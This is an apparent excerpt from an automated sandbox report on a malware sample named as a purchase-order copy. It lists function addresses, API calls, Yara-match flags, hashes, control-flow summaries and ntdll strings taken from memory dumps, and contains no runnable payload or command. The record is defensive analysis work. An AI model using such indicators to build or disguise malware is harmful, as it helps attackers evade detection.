                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 3cbafcbb204b78bcf82abb4cf732ec46d42f0b04ed4e9d16c39dafc5bdaef8ad
                            • Instruction ID: 8a47e10f0e71a2f486c204e85be5e2537a10e146260891d447815d9a4c113819
                            • Opcode Fuzzy Hash: 3cbafcbb204b78bcf82abb4cf732ec46d42f0b04ed4e9d16c39dafc5bdaef8ad
                            • Instruction Fuzzy Hash: 29015EB5E0020DABDB10DAE1DC42FEEB3B89B14308F0081AAF90897240F635EB558B95
                            Function 0042AE13 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 89 42ae13-42ae4f call 4048b3 call 42beb3 NtClose
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction ID: 6bfe94eaadacc5ae6f362a77a2d9918d31d53368c4b45a4388c7d008d788773a
                            • Opcode Fuzzy Hash: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction Fuzzy Hash: CFE04F362012147BD620FA5ADC01FDBBBACDBC5714F408829FA0967282C670790187F4
                            Function 01672B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 103 1672b60-1672b6c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b513b63147641eee450573e7b0ef7c5ef69d85a89e71a6ad1e9a9a911e93074f
                            • Instruction ID: 257ee6f4691d5aeb9ff7d329ed18a8764970e55b0fdb6b7eb0f2b8adcab13555
                            • Opcode Fuzzy Hash: b513b63147641eee450573e7b0ef7c5ef69d85a89e71a6ad1e9a9a911e93074f
                            • Instruction Fuzzy Hash: 0690026120240003410575584854617900F97E0301B95C121E5014694EC52589916225
                            Function 01672DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 105 1672df0-1672dfc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 7e0477e172ce9848950cde5b3489a1e3861ce84bca72ba8978320a2c11cbf859
                            • Instruction ID: bd5cc0e7e9cfe75fdde6058408e791a5d1253543e86c197f74e48c7122ba8430
                            • Opcode Fuzzy Hash: 7e0477e172ce9848950cde5b3489a1e3861ce84bca72ba8978320a2c11cbf859
                            • Instruction Fuzzy Hash: 0790023120140413D11175584944707500E97D0341FD5C512A442465CED6568A52A221
                            Function 01672C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 104 1672c70-1672c7c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 87a34193e999f5f5aa0f233858b76de4cabaff4e85dc20ff60a456359a59377c
                            • Instruction ID: 28b830a0436ec01d3d503c63043326f2e13dcf2d3c92ba18d43c8cbf200a282b
                            • Opcode Fuzzy Hash: 87a34193e999f5f5aa0f233858b76de4cabaff4e85dc20ff60a456359a59377c
                            • Instruction Fuzzy Hash: D590023120148802D1107558884474B500A97D0301F99C511A842475CEC69589917221
                            Function 016735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 106 16735c0-16735cc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: dc3ad8e5aba94c3f6dfe80e62acf656fc8296abd67b9a02126911d81f65bd692
                            • Instruction ID: d240e07392bf4aba2b2a58b59623eabd7aa0899ad997900e13dcd77e36371a5b
                            • Opcode Fuzzy Hash: dc3ad8e5aba94c3f6dfe80e62acf656fc8296abd67b9a02126911d81f65bd692
                            • Instruction Fuzzy Hash: 3F90023160550402D10075584954707600A97D0301FA5C511A442466CEC7958A5166A2
                            Function 0041824F Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <>P?
                            • API String ID: 0-3113296118
                            • Opcode ID: 59ef3256abf5a8ef311ac280c4e49ae430bbe033155eef5778bb6680b6fd4f6c
                            • Instruction ID: ce0acdb2f9010b4b160955a3993849b46c2ca3b9f98f0f3b2027605a4e0c27f3
                            • Opcode Fuzzy Hash: 59ef3256abf5a8ef311ac280c4e49ae430bbe033155eef5778bb6680b6fd4f6c
                            • Instruction Fuzzy Hash: 2221B170904385ABC711DB79CC81EDFFBB8AF42328F14868FE46457283C6319445C7A6
                            Function 0041386C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(HH-71hzM,00000111,00000000,00000000), ref: 004138EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: HH-71hzM$HH-71hzM
                            • API String ID: 1836367815-1059082789
                            • Opcode ID: 3d02f43e9fdcdb9462eb9e6c05619794dc37e26c88354f827bb8d0b999b777bb
                            • Instruction ID: 7f04475fb0b2d10d19a586b8a7071c2288f42e986672de047228a42b417ab81a
                            • Opcode Fuzzy Hash: 3d02f43e9fdcdb9462eb9e6c05619794dc37e26c88354f827bb8d0b999b777bb
                            • Instruction Fuzzy Hash: 1A11C8B2E0015C7ADB01ABE5DC81DEF7B7CDF81798F418169FA14BB101D6784E0A87A5
                            Function 00413873 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 15 413873-413885 16 41388d-4138dd call 42d793 call 417253 call 404823 call 4240e3 15->16 17 413888 call 42cd83 15->17 26 4138fd-413903 16->26 27 4138df-4138ee PostThreadMessageW 16->27 17->16 27->26 28 4138f0-4138fa 27->28 28->26
                            APIs
                            • PostThreadMessageW.USER32(HH-71hzM,00000111,00000000,00000000), ref: 004138EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: HH-71hzM$HH-71hzM
                            • API String ID: 1836367815-1059082789
                            • Opcode ID: 39cc1447e118cc9378784c0d4073e030fd935f2a21dc8a4844056e6d457e6531
                            • Instruction ID: 673598bfc798823b2eecc644bdd5bb59425457905a74473335ffc0355b149099
                            • Opcode Fuzzy Hash: 39cc1447e118cc9378784c0d4073e030fd935f2a21dc8a4844056e6d457e6531
                            • Instruction Fuzzy Hash: 5201C4B2E0021C7ADB01AAE59C82DEF7B7CDF41698F418169FA14B7241D6784E0687A5
                            Function 00417246 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 62 417246-417247 63 417249-41727c call 42d9e3 62->63 64 417298-41729d call 42e1a3 62->64 69 417282-417290 call 42df03 63->69 70 41727e-417281 63->70 71 4172a0-4172b1 call 42c3a3 64->71 69->71 78 417292-417297 69->78 76 4172b3-4172c7 LdrLoadDll 71->76 77 4172ca-4172cd 71->77 76->77 78->64
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172C5
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 51f215d03ed2bb803e83f769321a4cef7c327660d9c7137f1af0a5ac968b8416
                            • Instruction ID: e5b8a6c68a6f9004244aac417fb29c764ff5a4d00e1c76ab783b07801a16e54c
                            • Opcode Fuzzy Hash: 51f215d03ed2bb803e83f769321a4cef7c327660d9c7137f1af0a5ac968b8416
                            • Instruction Fuzzy Hash: E70144B5D4410DABDF00DAD5D882BEDB7749B55308F008296ED1897241F634DB65CB91
                            Function 0042B163 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 84 42b163-42b1a4 call 4048b3 call 42beb3 RtlFreeHeap
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F445C77A,00000007,00000000,00000004,00000000,00416B30,000000F4,?,?,?,?,?), ref: 0042B19F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: b8acce31f274aa27ecedb377be3c6f3336657f9b78793ef0f07d4015a8d14003
                            • Instruction ID: b58052bfe700269c14d2fe7c8094052ca3d6c5cef53a15d776266347ef73832c
                            • Opcode Fuzzy Hash: b8acce31f274aa27ecedb377be3c6f3336657f9b78793ef0f07d4015a8d14003
                            • Instruction Fuzzy Hash: 0EE06DB22042487FD610EE59EC41FDB37ACEFC4714F108419FA08A7281C670B9118BF8
                            Function 0042B113 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 79 42b113-42b154 call 4048b3 call 42beb3 RtlAllocateHeap
                            APIs
                            • RtlAllocateHeap.NTDLL(?,0041DAAB,?,?,00000000,?,0041DAAB,?,?,?), ref: 0042B14F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 66be5ddc2b89073eb30e9d0bd3799b043242f50acd063acfbdbcd1ab245d0047
                            • Instruction ID: 416312d8f7145b97cedd798e91ca089b0566e551d369e4847a4ff3dde7a147e9
                            • Opcode Fuzzy Hash: 66be5ddc2b89073eb30e9d0bd3799b043242f50acd063acfbdbcd1ab245d0047
                            • Instruction Fuzzy Hash: 6FE06DB22042087BD614EE99EC41FDB37ACEFC8714F408419FA08A7281C674B9118BF4
                            Function 0042B1B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 42b1b3-42b1ef call 4048b3 call 42beb3 ExitProcess
                            APIs
                            • ExitProcess.KERNEL32(?,00000000,?,?,6F74F5A5,?,?,6F74F5A5), ref: 0042B1EA
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 755c6b5068bf6800ff1f500d9f8bda3ea0d07cc42bbbad633bb5d3abef35f631
                            • Instruction ID: e6e49562872f75b942fa82bb2d298d416b05f652ca00a833db113ede6e552c6f
                            • Opcode Fuzzy Hash: 755c6b5068bf6800ff1f500d9f8bda3ea0d07cc42bbbad633bb5d3abef35f631
                            • Instruction Fuzzy Hash: 5FE01A362012147BD120AA5ADC02F97775CDBC5714F418419FA08A7242C771A9108BE4
                            Function 01672C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 99 1672c0a-1672c0f 100 1672c11-1672c18 99->100 101 1672c1f-1672c26 LdrInitializeThunk 99->101
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e2c4ece88aa474fe0faf708e6a9506619505fa41afe0de4064834f09771e173d
                            • Instruction ID: a007f69033aac91eea3b2efbabe2b783b310ecca808f24ce46b4089622408628
                            • Opcode Fuzzy Hash: e2c4ece88aa474fe0faf708e6a9506619505fa41afe0de4064834f09771e173d
                            • Instruction Fuzzy Hash: 25B09B719015C5C5DA51F7644E08717790577D0701F55C165D3030755F4738C1D1E275

                            Non-executed Functions

                            Function 016B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2160512332
                            • Opcode ID: fc502a2d1394ef46f5637b2d69a9232f6ee8567951f96002fdb5e6176f5f402b
                            • Instruction ID: b2c854b8ab92919f2d925c835bc1f5b64657a2a080aceb73f821b14990e221cc
                            • Opcode Fuzzy Hash: fc502a2d1394ef46f5637b2d69a9232f6ee8567951f96002fdb5e6176f5f402b
                            • Instruction Fuzzy Hash: 5592AC71604342ABE721DF28CC90BABBBE9BB84714F04492DFA95D7350D770E885CB96
                            Function 01668620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                            Download Yara Rule
                            Strings
                            • Thread is in a state in which it cannot own a critical section, xrefs: 016A5543
                            • Critical section address., xrefs: 016A5502
                            • Address of the debug info found in the active list., xrefs: 016A54AE, 016A54FA
                            • Critical section debug info address, xrefs: 016A541F, 016A552E
                            • Thread identifier, xrefs: 016A553A
                            • undeleted critical section in freed memory, xrefs: 016A542B
                            • Critical section address, xrefs: 016A5425, 016A54BC, 016A5534
                            • corrupted critical section, xrefs: 016A54C2
                            • 8, xrefs: 016A52E3
                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016A54E2
                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016A540A, 016A5496, 016A5519
                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016A54CE
                            • Invalid debug info address of this critical section, xrefs: 016A54B6
                            • double initialized or corrupted critical section, xrefs: 016A5508
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                            • API String ID: 0-2368682639
                            • Opcode ID: 7cbe1a1da318244bce33da0c59c8c7183c517f80e804b387048e68f117351823
                            • Instruction ID: 9cf0a63e1207588f704aebafb40c6f15bb49353e628f57bd73cca629637ef7ae
                            • Opcode Fuzzy Hash: 7cbe1a1da318244bce33da0c59c8c7183c517f80e804b387048e68f117351823
                            • Instruction Fuzzy Hash: CB8189B1A41358AFDB20CF99CC41BAEBBB9EB48B10F684159F506B7240D375AD41CF60
                            Function 016629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                            Download Yara Rule
                            Strings
                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 016A2498
                            • @, xrefs: 016A259B
                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 016A2409
                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 016A2412
                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016A22E4
                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 016A2506
                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016A25EB
                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 016A261F
                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016A24C0
                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 016A2602
                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 016A2624
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                            • API String ID: 0-4009184096
                            • Opcode ID: 4bc8f7a4a91d92cff85bdbc3239d085a052194b25e9c9cffd1f1e15ff299a18e
                            • Instruction ID: 3ec5a52d8ba8d3cd9d2bd3f1bc5fab449d2142f29724f62e3992406b8a0c6485
                            • Opcode Fuzzy Hash: 4bc8f7a4a91d92cff85bdbc3239d085a052194b25e9c9cffd1f1e15ff299a18e
                            • Instruction Fuzzy Hash: A8028FB1D402299FDB61DB54CC90BDAB7B8AF54304F4041EEEA09A7241EB30AE85CF59
                            Function 016D8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                            • API String ID: 0-2515994595
                            • Opcode ID: a903a4066bd420fac3d388646bfda89039e1657f4e0515be560fa5281d277c4d
                            • Instruction ID: dab8a732e7fc90b43b1e82c5c701a1903d326d0fb8fbbd3cb5c7809ab0670399
                            • Opcode Fuzzy Hash: a903a4066bd420fac3d388646bfda89039e1657f4e0515be560fa5281d277c4d
                            • Instruction Fuzzy Hash: 5551B171A043419BD32ADF188C48BABBBECFF94650F14492DF999C3281E770E605C7A2
                            Function 016E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                            • API String ID: 0-1700792311
                            • Opcode ID: 9a26340fdc46381f315216cd0675db48f5d6a1259e56fc36be06533219375cab
                            • Instruction ID: eaaac44ac4b1b00a7941b8965459f9e9f1ad75f3a52f7a8b98f7b2904ab84643
                            • Opcode Fuzzy Hash: 9a26340fdc46381f315216cd0675db48f5d6a1259e56fc36be06533219375cab
                            • Instruction Fuzzy Hash: 9DD1CF31602696DFDB22DF68C848AAABBF2FF5A710F188149F4469B351C7B49942CF14
                            Function 016B89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                            Download Yara Rule
                            Strings
                            • VerifierDebug, xrefs: 016B8CA5
                            • AVRF: -*- final list of providers -*- , xrefs: 016B8B8F
                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 016B8A67
                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 016B8A3D
                            • HandleTraces, xrefs: 016B8C8F
                            • VerifierFlags, xrefs: 016B8C50
                            • VerifierDlls, xrefs: 016B8CBD
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                            • API String ID: 0-3223716464
                            • Opcode ID: 0e2c69d13752194f3e940fc560b589f692e72acc4ac0acc7ea17a54f5b20c9ae
                            • Instruction ID: c3c52c3dc3006e6160760a1cb399635ddb7f4f9139feb34246b6ccd3b205f6ef
                            • Opcode Fuzzy Hash: 0e2c69d13752194f3e940fc560b589f692e72acc4ac0acc7ea17a54f5b20c9ae
                            • Instruction Fuzzy Hash: 829123B2645722AFD331DF288CD0BEA7BEDAB55724F44445DFA416B281C7309C82CB99
                            Function 016663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-792281065
                            • Opcode ID: a1b0746c4d8ce3c70bf23d701edc7b1093a5534861527e2f3710b2aa0d05ce05
                            • Instruction ID: 141160f429d952b2eec565bdbb76dd1dacfe6da3fba392c35fcb4d3b47b451db
                            • Opcode Fuzzy Hash: a1b0746c4d8ce3c70bf23d701edc7b1093a5534861527e2f3710b2aa0d05ce05
                            • Instruction Fuzzy Hash: 0E917A70B013159BEB35DF18EC94BAA7BA6FF50B24F58812DE90167381DBB49C42CB94
                            Function 0162645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                            Download Yara Rule
                            Strings
                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016899ED
                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01689A01
                            • apphelp.dll, xrefs: 01626496
                            • minkernel\ntdll\ldrinit.c, xrefs: 01689A11, 01689A3A
                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01689A2A
                            • LdrpInitShimEngine, xrefs: 016899F4, 01689A07, 01689A30
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-204845295
                            • Opcode ID: 71aefc4c8b3d7673c3601fb5187014d63af3b4beb3cccf95c3a0882cc055af27
                            • Instruction ID: c16092bb19f968a913e3c8ddcd78768e1d057b71cee2b226b65f7e009a0ea02f
                            • Opcode Fuzzy Hash: 71aefc4c8b3d7673c3601fb5187014d63af3b4beb3cccf95c3a0882cc055af27
                            • Instruction Fuzzy Hash: 7151DF712483059FE720EF24CC91BABB7E5FB84758F044A1DF98697254DB30E905CB96
                            Function 01662674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                            Download Yara Rule
                            Strings
                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 016A2180
                            • SXS: %s() passed the empty activation context, xrefs: 016A2165
                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 016A2178
                            • RtlGetAssemblyStorageRoot, xrefs: 016A2160, 016A219A, 016A21BA
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016A21BF
                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 016A219F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
